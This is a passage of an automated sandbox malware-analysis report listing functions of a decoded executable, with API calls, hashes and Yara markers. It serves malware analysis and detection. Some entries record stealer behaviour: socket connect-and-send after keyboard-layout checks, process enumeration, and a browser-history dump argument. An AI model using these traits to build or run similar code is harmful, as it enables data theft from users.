                                                                                                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 10005A13
                                                                                                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 10005A1D
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                                                                                              • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                                                                                              • API String ID: 909987262-4289949731
                                                                                                                                                                                                                                                                                                                              • Opcode ID: c31bbaabfe33cba66093c9bc0617cae6cf84ad75179dcb5b20fe35c44385c536
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 1f1fc70b04df716a51afbffcc927e8f2192dc69e1f8a2574b42c8594fe6aa3ea
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c31bbaabfe33cba66093c9bc0617cae6cf84ad75179dcb5b20fe35c44385c536
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4E15075A0020ADBDB20CF48D5C099FB7B6FF84392B204529E8459B218DB32FE55CBE1
                                                                                                                                                                                                                                                                                                                              Function 10005130 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 232COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-4289949731
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 00a987656fc0242e94ed32e6d23404793de4b9a1301657215df60f1b91871642
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 4e0e01030c44db973a3d1f6ba28005194938e7e7133fae708877df5374af968a
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 00a987656fc0242e94ed32e6d23404793de4b9a1301657215df60f1b91871642
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 48717F35B046099BDB24CE5CD88099FB3F6FF89392720492EE946C7304DB32EA50CB91
                                                                                                                                                                                                                                                                                                                              Function 00416751 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 182threadwindowCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                                                                                                                                                                                                                                                                                              • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                                                                                                                                                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 004167A1
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ProcessWindow$Open$TextThreadVisible
                                                                                                                                                                                                                                                                                                                              • String ID: (FG
                                                                                                                                                                                                                                                                                                                              • API String ID: 3142014140-2273637114
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 95fdf2574fb4d1fc6b51bfc871b7093418cbd5d7cbbc1f137bebfaeb276699bb
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 0f4eca603db080fccf2d1fd4ef2663101a063c6717372172f7cb8e83fece0a9a
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 95fdf2574fb4d1fc6b51bfc871b7093418cbd5d7cbbc1f137bebfaeb276699bb
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4871E5321082454AC325FB61D8A5ADFB3E4AFE4308F50453EF58A530E1EF746A49CB9A
                                                                                                                                                                                                                                                                                                                              Function 0044D469 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • _strpbrk.LIBCMT ref: 0044D4B8
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044D5D5
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0043A864: IsProcessorFeaturePresent.KERNEL32(00000017,0043A836,?,?,?,00414BBD,?,00000000,00000000,?,0043A856,00000000,00000000,00000000,00000000,00000000), ref: 0043A866
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0043A864: GetCurrentProcess.KERNEL32(C0000417), ref: 0043A888
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0043A864: TerminateProcess.KERNEL32(00000000), ref: 0043A88F
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                                                                                                                                                                                                                                              • String ID: *?$.
                                                                                                                                                                                                                                                                                                                              • API String ID: 2812119850-3972193922
                                                                                                                                                                                                                                                                                                                              • Opcode ID: dbad545dedeb202f26215854c3da024dc0fb99b6c0e3b260b863dc96475f25f4
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 5f997c8b803d418df4da1c9987192ed3b052b04d21a58de33721a68e59565ce0
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dbad545dedeb202f26215854c3da024dc0fb99b6c0e3b260b863dc96475f25f4
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC519571D00209AFEF14DFA9C841AAEB7B5EF58318F24816FE454E7341DA799E01CB54
                                                                                                                                                                                                                                                                                                                              Function 10005A30 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 161COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 10005B96
                                                                                                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 10005BA0
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                                                                                              • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                                                                                              • API String ID: 909987262-4289949731
                                                                                                                                                                                                                                                                                                                              • Opcode ID: fc346df6448d015f2536282332afe1f921232bb14d5250de72cf420a791fc6e4
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 6c1523fb328dcf9ae6a9c50ad7b05ab603d263373fb6ba5bb73130adc7b49d3b
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc346df6448d015f2536282332afe1f921232bb14d5250de72cf420a791fc6e4
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE4181717047098FA724DE58E8C095BB3E9FF846863610A2EF442C7619EB32FD15C7A1
                                                                                                                                                                                                                                                                                                                              Function 004095D6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 158COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004041F1: socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040428C: connect.WS2_32(?,007E5980,00000010), ref: 004042A5
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B6BA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6CF
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(00000278,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                                                                                                                                                                                                                                                                                              • String ID: XCG$`AG$>G
                                                                                                                                                                                                                                                                                                                              • API String ID: 2334542088-2372832151
                                                                                                                                                                                                                                                                                                                              • Opcode ID: abf96a2e131c113fa51a5dcca27fb2f6e317e9ae875eadb6cd82fc6fd6a5dabd
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 51992e77998e29381c1adf086b38d2340c1e01042c89ae8fe5bc0f900910b53e
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: abf96a2e131c113fa51a5dcca27fb2f6e317e9ae875eadb6cd82fc6fd6a5dabd
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E5132321042405AC325F775D8A2AEF73E5ABE4308F50493FF94A631E2EE785949C69E
                                                                                                                                                                                                                                                                                                                              Function 02834BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe,00000104), ref: 02834C1D
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02834CE8
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02834CF2
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              • C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, xrefs: 02834C14, 02834C1B, 02834C4A, 02834C82
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
                                                                                                                                                                                                                                                                                                                              • API String ID: 2506810119-1019292157
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 80041ebbf1974f6c38280cb2242725363c447aed8f2bd5040ecced087da9d4ba
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 97f1e333df752f454336809d659ce9f8347990dbc7464112706a4e65ecff6ede
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 80041ebbf1974f6c38280cb2242725363c447aed8f2bd5040ecced087da9d4ba
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C531627DA40218AFEB22DF9D988099EBBFDEB85314B104196E804D7240E7719A42CFA1
                                                                                                                                                                                                                                                                                                                              Function 10004890 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 113COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 10004988
                                                                                                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 10004992
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                                                                                              • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                                                                                              • API String ID: 909987262-4289949731
                                                                                                                                                                                                                                                                                                                              • Opcode ID: ea482594aa6774e91285724cbac881b05db441b3c504b9e64c6bf29ac5aef023
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 5dc71b71bde44702d26a4cbc12f9298653d6fc4ab722c143c4ed6f2fd59d79f2
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ea482594aa6774e91285724cbac881b05db441b3c504b9e64c6bf29ac5aef023
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9C31BC763053058BAB24CF5CF88095BB3E9FF857913120A3EE546C7619DB31E91487A9
                                                                                                                                                                                                                                                                                                                              Function 10003FF0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 108COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 100040D8
                                                                                                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 100040E2
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                                                                                              • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                                                                                              • API String ID: 909987262-4289949731
                                                                                                                                                                                                                                                                                                                              • Opcode ID: b8c36c1bc06ab5f4c21a442c8b2e8ddece411d5689db3b951c93075d282b484f
                                                                                                                                                                                                                                                                                                                              • Instruction ID: dceabf25fecf4d0f8060b32b9c351c32afdfa4cc9e92bfec45e796551365fa88
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b8c36c1bc06ab5f4c21a442c8b2e8ddece411d5689db3b951c93075d282b484f
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9431D4B6700700CFE724CF5CE880B5BB3E5EF90691B120A2EF652C7649CB72E95087A5
                                                                                                                                                                                                                                                                                                                              Function 00403A10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92sleepCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                                                                                                                                                                                                                                              • String ID: /sort "Visit Time" /stext "$8>G
                                                                                                                                                                                                                                                                                                                              • API String ID: 368326130-2663660666
                                                                                                                                                                                                                                                                                                                              • Opcode ID: c7ff2649efce58f83725c8427dfb7052f5966fb24c69250c54119f6e98d36ac3
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 14a2de6876ab63adfaf4c6869ac5cc0218acab93288f76d9a5f97452818968e4
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c7ff2649efce58f83725c8427dfb7052f5966fb24c69250c54119f6e98d36ac3
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 36317331A0021556CB14FBB6DC969EE7775AF90318F40007FF906B71D2EF385A8ACA99
                                                                                                                                                                                                                                                                                                                              Function 0044DCD8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0044DDF7: _abort.LIBCMT ref: 0044DE29
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0044DDF7: _free.LIBCMT ref: 0044DE5D
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0044DA6C: GetOEMCP.KERNEL32(00000000,?,?,0044DCF5,?), ref: 0044DA97
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044DD50
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044DD86
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
